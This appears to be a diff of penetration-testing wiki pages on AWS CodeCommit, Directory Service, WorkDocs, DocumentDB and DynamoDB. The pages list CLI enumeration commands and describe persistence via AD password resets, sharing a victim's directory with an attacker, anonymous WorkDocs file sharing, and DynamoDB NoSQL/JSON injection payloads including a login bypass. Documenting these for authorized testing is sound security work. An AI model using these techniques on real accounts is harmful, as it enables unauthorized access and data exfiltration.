+CodeCommit eliminates the need to **operate and scale your own source-control infrastructure**, but it remains a Git-based service and users still interact with Git concepts and tooling. It supports standard Git functionality and works with existing Git clients.<sup>[[6]](#references)</sup>
+
+After temporarily closing new-customer access in 2024, AWS returned CodeCommit to general availability and reopened it to new customers in November 2025.<sup>[[10]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI command reference documents the CodeCommit repository, branch, file, pull-request, approval-rule-template, and trigger operations used below.<sup>[[7]](#references)</sup>
+
+For SSH-based repository access, AWS documents the public/private-key setup and the `git clone ssh://.../v1/repos/...` form shown below.<sup>[[8]](#references)</sup>
 
 ```bash
 # Repos
@@ -98,10 +108,15 @@ git clone ssh://<SSH-KEY-ID>@git-codecommit.<REGION>.amazonaws.com/v1/repos/<rep
 
 ## References
 
-- [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html)
+- [1] [Analytics - Overview of Amazon Web Services](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html)
+- [2] [What is AWS Data Pipeline? - AWS Data Pipeline](https://docs.aws.amazon.com/datapipeline/latest/DeveloperGuide/what-is-datapipeline.html)
+- [3] [datapipeline - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/datapipeline/)
+- [4] [What is AWS CodePipeline? - AWS CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/userguide/welcome.html)
+- [5] [codepipeline - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codepipeline/)
+- [6] [What is AWS CodeCommit? - AWS CodeCommit](https://docs.aws.amazon.com/codecommit/latest/userguide/welcome.html)
+- [7] [codecommit - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codecommit/)
+- [8] [Setup steps for SSH connections to AWS CodeCommit repositories on Linux, macOS, or Unix](https://docs.aws.amazon.com/codecommit/latest/userguide/setting-up-ssh-unixes.html)
+- [9] [Migrate workloads from AWS Data Pipeline](https://aws.amazon.com/blogs/big-data/migrate-workloads-from-aws-data-pipeline/)
+- [10] [The Future of AWS CodeCommit](https://aws.amazon.com/blogs/devops/aws-codecommit-returns-to-general-availability/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md
@@ -1,28 +1,30 @@
 # AWS - Directory Services / WorkDocs Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Directory Services
 
-AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud.
+AWS Directory Service for Microsoft Active Directory (AWS Managed Microsoft AD) is a managed Microsoft Active Directory service in AWS. It runs domain controllers in your VPC while AWS manages monitoring, recovery, replication, snapshots, and software updates.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Options
 
-Directory Services allows to create 5 types of directories:
+AWS Directory Service provides these Microsoft Active Directory options:
 
-- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC.
-- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC.
-- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**.
-- **Amazon Cognito User Pools**: This is the same as Cognito User Pools.
-- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**.
+- **AWS Managed Microsoft AD**: A new managed Microsoft Active Directory in AWS. The directory has domain controllers in a VPC and an administrator account whose password is set during creation.<sup>[[2]](#references)</sup>
+- **Simple AD**: A standalone, managed, Samba 4 Active Directory-compatible directory. AWS documents small and large sizes, but Simple AD is no longer open to new customers starting July 30, 2026.<sup>[[4]](#references)</sup>
+- **AD Connector**: A proxy that connects compatible AWS applications to an existing enterprise Active Directory. Directory data remains on the existing domain controllers rather than being replicated into AWS.<sup>[[1]](#references)[[3]](#references)</sup>
 
-AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**.
+AWS documents Amazon Cognito user pools and Amazon Cloud Directory separately from these Directory Service options; they should therefore be treated as separate AWS services, not Directory Service directory types.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
+
+Cloud Directory is schema-based, while Cognito user pools provide user directories for application authentication.<sup>[[5]](#references)[[6]](#references)</sup>
+
+AWS Directory Service can therefore host a managed AD, connect an existing on-premises AD, or provide a Samba-compatible Simple AD.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### Lab
 
-Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
+Here you can find a tutorial to create your own Microsoft AD in AWS: [Tutorial: Setting up your base AWS Managed Microsoft AD test lab in AWS](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html).<sup>[[7]](#references)</sup>
 
 ### Enumeration
+
+The following AWS CLI calls enumerate Directory Service directories and domain controllers. `describe-directories` returns all directories in the account when no IDs are supplied, while `describe-domain-controllers` requires a directory ID.<sup>[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 # Get directories and DCs
@@ -37,15 +39,19 @@ aws ds list-certificates --directory-id <id>
 aws ds describe-certificate --directory-id <id> --certificate-id <id>
 ```
 
+The remaining calls query trust relationships, LDAPS settings, shared-directory metadata, account limits, and registered certificate information.<sup>[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
+
 ### Login
 
-Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:**
+`AccessUrl` is a field in the directory description, distinct from the free-form `Description` field. It identifies an application access URL such as `<alias>.awsapps.com`; by default, the URL opens the WorkDocs sign-in page.<sup>[[9]](#references)[[17]](#references)</sup>
 
-- `<name>.awsapps.com/connect` (Amazon Connect)
-- `<name>.awsapps.com/workdocs` (Amazon WorkDocs)
-- `<name>.awsapps.com/workmail` (Amazon WorkMail)
-- `<name>.awsapps.com/console` (Amazon Management Console)
-- `<name>.awsapps.com/start` (IAM Identity Center)
+AD credentials can be used only after the relevant AWS application or service is enabled and configured for the directory. AWS documents this model for the AWS Management Console, IAM Identity Center, Connect Customer, WorkDocs, WorkMail, and other integrations.<sup>[[18]](#references)</sup>
+
+- `https://<instance-name>.my.connect.aws/` (current Connect Customer URL; older instances may still use `<name>.awsapps.com/connect/`).<sup>[[19]](#references)</sup>
+- `https://<site-name>.awsapps.com/` (Amazon WorkDocs).<sup>[[20]](#references)</sup>
+- `https://<alias>.awsapps.com/mail` (Amazon WorkMail).<sup>[[21]](#references)</sup>
+- `https://<alias>.awsapps.com/console/` (AWS Management Console).<sup>[[22]](#references)</sup>
+- `https://<identity-center-subdomain>.awsapps.com/start` (IAM Identity Center access portal; this URL is configured for IAM Identity Center and is not necessarily the Directory Service `AccessUrl`).<sup>[[23]](#references)</sup>
 
 ### Privilege Escalation
 
@@ -57,58 +63,72 @@ Note that if the **description** of the directory contained a **domain** in the 
 
 ### Using an AD user
 
-An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console.
+For AWS Managed Microsoft AD, directory creation creates the default `Admin` account and AWS allows its password to be changed. Simple AD uses `Administrator` as its directory administrator name instead.<sup>[[4]](#references)[[24]](#references)</sup>
 
-Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\
-It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth).
+Directory members do not have AWS resource access by default; an administrator must assign IAM roles and policies to directory users or groups.<sup>[[22]](#references)[[25]](#references)</sup>
+
+Therefore, an authorized operator could preserve access by changing the `Admin` or another user's password, creating or changing a user, and assigning that user or an AD group to an IAM role.<sup>[[24]](#references)[[25]](#references)</sup>
 
 ### Sharing AD (from victim to attacker)
 
-It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\
-However, this implies sharing the managed AD and also creating an VPC peering connection.
+An AWS Managed Microsoft AD owner can share a directory with trusted AWS accounts, including accounts outside the owner's organization. The consumer account receives a shared-directory relationship and can use the shared directory.<sup>[[26]](#references)</sup>
 
-You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
+Network connectivity is required for cross-account directory sharing. VPC peering is one option, alongside Transit Gateway and VPN; it is not the only possible network design.<sup>[[26]](#references)</sup>
+
+You can find a guide here: [Step 1: Set up your networking environment](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html).<sup>[[27]](#references)</sup>
 
 ### ~~Sharing AD (from attacker to victim)~~
 
-It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account.
+Directory sharing is initiated by the directory owner; an unrelated AD cannot simply be attached to an AWS account. Users from a self-managed AD can nevertheless access AWS resources when a supported trust or identity integration is configured and the required IAM roles are assigned.<sup>[[18]](#references)[[25]](#references)[[26]](#references)</sup>
 
 ## WorkDocs
 
-Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents.
+**Current status:** AWS says that new customer sign-ups and account upgrades are no longer available for Amazon WorkDocs. The commands below apply to existing sites and can also help with authorized administration or migration work.<sup>[[28]](#references)[[29]](#references)</sup>
 
-AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools.
+Amazon WorkDocs is a cloud service for storing, managing, sharing, and collaborating on documents and other files through a web client or mobile app. WorkDocs maintains file versions, and administrators can enable live collaborative editing integrations. Authorized applications can also interact with WorkDocs through its API and AWS CLI.<sup>[[30]](#references)[[31]](#references)[[32]](#references)[[33]](#references)</sup>
 
 ### Enumeration
 
+The AWS CLI examples below use the WorkDocs organization ID, which is the directory ID associated with the site. For administrative SigV4 requests, `describe-activities` requires `--organization-id`; `--user-id` is an optional filter.<sup>[[33]](#references)[[34]](#references)</sup>
+
 ```bash
-# Get AD users (Admin not included)
+# Get WorkDocs users for the directory-backed site
 aws workdocs describe-users --organization-id <directory-id>
-# Get AD groups (containing "a")
+# Search WorkDocs groups by name query
 aws workdocs describe-groups --organization-id d-9067a0285c --search-query a
 
-# Create user (created inside the AD)
+# Create a user (Simple AD or Microsoft AD; not a Connected AD site)
 aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
 
-# Get what each user has created
-aws workdocs describe-activities --user-id "S-1-5-21-377..."
+# Get activities for one user
+aws workdocs describe-activities --organization-id <directory-id> --user-id "S-1-5-21-377..."
 
-# Get what was created in the directory
+# Get activities in the directory
 aws workdocs describe-activities --organization-id <directory-id>
 
-# Get folder content
-aws workdocs describe-folder-contents --folder-id <fold-id>
+# Get folder contents
+aws workdocs describe-folder-contents --folder-id <folder-id>
 
-# Get file (a url to access with the content will be retreived)
+# Get document metadata
 aws workdocs get-document --document-id <doc-id>
 
-# Get resource permissions if any
+# Get a document version's signed source URL
+aws workdocs get-document-version --document-id <doc-id> --version-id <version-id> --fields SOURCE
+
+# Get resource permissions, if any
 aws workdocs describe-resource-permissions --resource-id <value>
 
-# Add permission so anyway can see the file
+# Add permission so an anonymous viewer can see the file, if public links are allowed
 aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
-## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
+# The response includes a ShareId; the site can expose it through a share link such as:
+# https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
 ```
+
+`get-document` returns document metadata; `get-document-version --fields SOURCE` is the operation that returns a signed source URL for a particular version.<sup>[[33]](#references)</sup>
+
+`create-user` is not valid for a Connected AD configuration: the user must already exist in the enterprise directory and then be activated in WorkDocs.<sup>[[35]](#references)</sup>
+
+The anonymous `VIEWER` principal is supported by the sharing API, but it provides read-only access and works only when the WorkDocs site's public-link policy permits anonymous sharing.<sup>[[36]](#references)[[37]](#references)</sup>
 
 ### Privesc
 
@@ -116,8 +136,44 @@ aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymo
 ../aws-privilege-escalation/aws-workdocs-privesc/README.md
 {{#endref}}
 
+## References
+
+- [1] [What is AWS Directory Service?](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/what_is.html)
+- [2] [AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/directory_microsoft_ad.html)
+- [3] [Getting started with AD Connector](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ad_connector_getting_started.html)
+- [4] [Simple AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/directory_simple_ad.html)
+- [5] [Amazon Cognito user pools](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools.html)
+- [6] [What Is Amazon Cloud Directory?](https://docs.aws.amazon.com/clouddirectory/latest/developerguide/what_is_cloud_directory.html)
+- [7] [Tutorial: Setting up your base AWS Managed Microsoft AD test lab in AWS](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html)
+- [8] [ds — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/index.html)
+- [9] [describe-directories — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-directories.html)
+- [10] [describe-domain-controllers — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-domain-controllers.html)
+- [11] [describe-trusts — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-trusts.html)
+- [12] [describe-ldaps-settings — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-ldaps-settings.html)
+- [13] [describe-shared-directories — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-shared-directories.html)
+- [14] [get-directory-limits — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/get-directory-limits.html)
+- [15] [list-certificates — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/list-certificates.html)
+- [16] [describe-certificate — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/describe-certificate.html)
+- [17] [Creating an access URL for AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_create_access_url.html)
+- [18] [Use Case 1: Sign in to AWS applications and services with Active Directory credentials](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/usecase1.html)
+- [19] [Update your Connect Customer domain](https://docs.aws.amazon.com/connect/latest/adminguide/update-your-connect-domain.html)
+- [20] [System requirements - archived Amazon WorkDocs User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/wd-sys-reqs.md)
+- [21] [What is Amazon WorkMail?](https://docs.aws.amazon.com/workmail/latest/adminguide/what_is.html)
+- [22] [Enabling AWS Management Console access with AWS Managed Microsoft AD credentials](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_management_console_access.html)
+- [23] [Signing in to the AWS access portal](https://docs.aws.amazon.com/singlesignon/latest/userguide/howtosignin.html)
+- [24] [Getting started with AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started.html)
+- [25] [Granting AWS Managed Microsoft AD users and groups access to AWS resources with IAM roles](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_manage_roles.html)
+- [26] [Share your AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_directory_sharing.html)
+- [27] [Step 1: Set up your networking environment](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html)
+- [28] [describe-users - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/describe-users.html)
+- [29] [Migrating data out of WorkDocs - archived Administration Guide](https://github.com/awsdocs/amazon-workdocs-administration-guide/blob/main/doc_source/migration.md)
+- [30] [What is Amazon WorkDocs - archived User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/what_is.md)
+- [31] [Understanding when Amazon WorkDocs creates versions - archived User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/version-creation.md)
+- [32] [Feedback and collaborative editing - archived WorkDocs User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/collab-editing.md)
+- [33] [WorkDocs examples using AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli_workdocs_code_examples.html)
+- [34] [describe-activities — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/workdocs/describe-activities.html)
+- [35] [Creating a user - archived Amazon WorkDocs Developer Guide](https://github.com/awsdocs/amazon-workdocs-dev-guide/blob/main/doc_source/creating-newuser.md)
+- [36] [Permissions - archived WorkDocs User Guide](https://github.com/awsdocs/amazon-workdocs-user-guide/blob/main/doc_source/permissions.md)
+- [37] [Managing link sharing - archived Amazon WorkDocs Administration Guide](https://github.com/awsdocs/amazon-workdocs-administration-guide/blob/main/doc_source/shareable-link-perms.md)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum/README.md
@@ -1,12 +1,12 @@
 # AWS - DocumentDB Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## DocumentDB
 
-Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
+Amazon DocumentDB is AWS's fully managed document database with MongoDB compatibility. Its compatibility layer is intended to let applications continue using familiar MongoDB drivers and tools while AWS handles the database service's operation and scaling.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI operations below inventory clusters and instances, inspect cluster parameter groups and their parameters, and enumerate cluster snapshots. Cluster details include the `MasterUsername` and primary `Endpoint`; instance details include each instance's endpoint address. Snapshot-attribute results can also show which accounts may copy or restore a manual snapshot, including whether the `restore` attribute makes it public.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint"
@@ -23,7 +23,7 @@ aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attribute
 
 ### NoSQL Injection
 
-As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks:
+Because DocumentDB exposes a MongoDB-compatible API, applications that turn untrusted request data into query objects or query strings should be assessed for NoSQL injection. The compatibility label alone does not prove that a deployment is vulnerable: test the application's actual query construction and the target's API behavior.<sup>[[2]](#references)[[9]](#references)[[10]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/nosql-injection.html
@@ -37,6 +37,15 @@ https://book.hacktricks.wiki/en/pentesting-web/nosql-injection.html
 
 ## References
 
-- [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
+- [1] [Analyze Amazon DocumentDB workloads with Performance Insights](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
+- [2] [What is Amazon DocumentDB (with MongoDB compatibility)](https://docs.aws.amazon.com/documentdb/latest/devguide/what-is.html)
+- [3] [describe-db-clusters — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-clusters.html)
+- [4] [describe-db-instances — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-instances.html)
+- [5] [describe-db-cluster-parameter-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-cluster-parameter-groups.html)
+- [6] [describe-db-cluster-parameters — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-cluster-parameters.html)
+- [7] [describe-db-cluster-snapshots — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-cluster-snapshots.html)
+- [8] [describe-db-cluster-snapshot-attributes — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/docdb/describe-db-cluster-snapshot-attributes.html)
+- [9] [NoSQL Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/NoSQL_Security_Cheat_Sheet.html)
+- [10] [Testing for NoSQL Injection — OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md
@@ -1,32 +1,32 @@
 # AWS - DynamoDB Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## DynamoDB
 
 ### Basic Information
 
-Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities.
+Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size.<sup>[[1]](#references)</sup> The service handles security and backups as a managed service, offers multi-Region replication through global tables, provides optional in-memory caching through DynamoDB Accelerator (DAX), and supports exporting table data to Amazon S3.<sup>[[1]](#references)[[3]](#references)[[4]](#references)[[8]](#references)</sup>
 
-In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization.
+In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization.<sup>[[2]](#references)</sup>
 
 ### Encryption
 
-By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account.
+By default, DynamoDB uses an AWS owned KMS key that **belongs to Amazon DynamoDB**, rather than the AWS managed `aws/dynamodb` key that belongs to your account.<sup>[[5]](#references)</sup>
 
 <figure><img src="https://lh4.googleusercontent.com/JjtNS7aA-_GRMgZb4v93jWEQJi6DQdUPq0FEpzZPdeyCeNoG05p0NJiV9Zs-ULs_-Tfjmx0W1ZgsE2Ui2ljo7D-1a87Xny-gpLVQO0XmXdFoph9ci1RepbVNwaCe9oPruEZSEDxGTxF5dIv6pW1WpT6kWA=s2048" alt=""><figcaption></figcaption></figure>
 
 ### Backups & Export to S3
 
-It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations.
+You can create **table backups** on **demand**, and AWS Backup can schedule backups. It's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for up to **35 days** to help you protect against accidental write or delete operations.<sup>[[6]](#references)[[7]](#references)[[23]](#references)</sup>
 
-It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**.
+It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**.<sup>[[8]](#references)</sup>
 
 ### GUI
 
-There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)
+There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin)<sup>[[19]](#references)[[20]](#references)[[21]](#references)[[22]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI exposes operations for listing and inspecting tables, backups, global tables, exports, and service endpoints. The `describe-table` response includes the table's key schema and metadata.<sup>[[2]](#references)[[9]](#references)</sup>
 
 ```bash
 # Tables
@@ -83,7 +83,7 @@ aws dynamodb describe-endpoints #Dynamodb endpoints
 
 ### SQL Injection
 
-There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+Amazon DynamoDB supports PartiQL, a SQL-compatible query language. If an application concatenates untrusted input into a PartiQL statement instead of using parameterized values, it can be vulnerable to SQL-style injection.<sup>[[15]](#references)[[16]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html
@@ -91,21 +91,23 @@ https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html
 
 ### NoSQL Injection
 
-In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\
+In DynamoDB different **conditions** can be used to retrieve or filter data. If an application allows an attacker to **chain more conditions**, the attacker could obtain hidden data (or dump the whole table).<sup>[[12]](#references)[[13]](#references)</sup>\
 You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
 
-Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**.
+Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**.<sup>[[10]](#references)[[11]](#references)</sup>
 
 > [!NOTE]
-> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited).
+> Actually, **Query** actions need to specify an **equality** condition for the **partition** key, although an optional sort-key condition can use other comparisons. This makes Query much **less prone to NoSQL injections** (and also makes the operation very limited).<sup>[[10]](#references)</sup>
 
 If you can **change the comparison** performed or add new ones, you could retrieve more data.
+
+For legacy filter inputs, examples of comparisons that can broaden results include `NE`, `NOT_CONTAINS`, and `GT`; the exact result depends on the attribute type and comparison ordering.<sup>[[12]](#references)</sup>
 
 ```bash
 # Comparators to dump the database
 "NE": "a123" #Get everything that doesn't equal "a123"
 "NOT_CONTAINS": "a123" #What you think
-"GT": " " #All strings are greater than a space
+"GT": " " #Many ordinary strings compare greater than a space
 ```
 
 {{#ref}}
@@ -115,9 +117,9 @@ https://book.hacktricks.wiki/en/pentesting-web/nosql-injection.html
 ### Raw Json injection
 
 > [!CAUTION]
-> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!**
+> **This vulnerability is based on DynamoDB's legacy `ScanFilter` parameter; new applications should use `FilterExpression` instead.**<sup>[[13]](#references)[[14]](#references)</sup>
 
-**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents.
+**DynamoDB** accepts **JSON** objects to **search** for data inside the DB through the legacy `ScanFilter` map. If you find that you can write in the JSON object sent to search, you could make the DB dump, all the contents.<sup>[[12]](#references)[[14]](#references)</sup>
 
 For example, injecting in a request like:
 
@@ -164,7 +166,7 @@ Some SDKs allows to use a string indicating the filtering to be performed like:
 new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)
 ```
 
-You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**.
+You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**.<sup>[[17]](#references)[[18]](#references)</sup>
 
 Therefore, a login like the previous one can be bypassed with something like:
 
@@ -175,8 +177,31 @@ Therefore, a login like the previous one can be bypassed with something like:
 # which is always true
 ```
 
+## References
+
+- [1] [What is Amazon DynamoDB?](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Introduction.html)
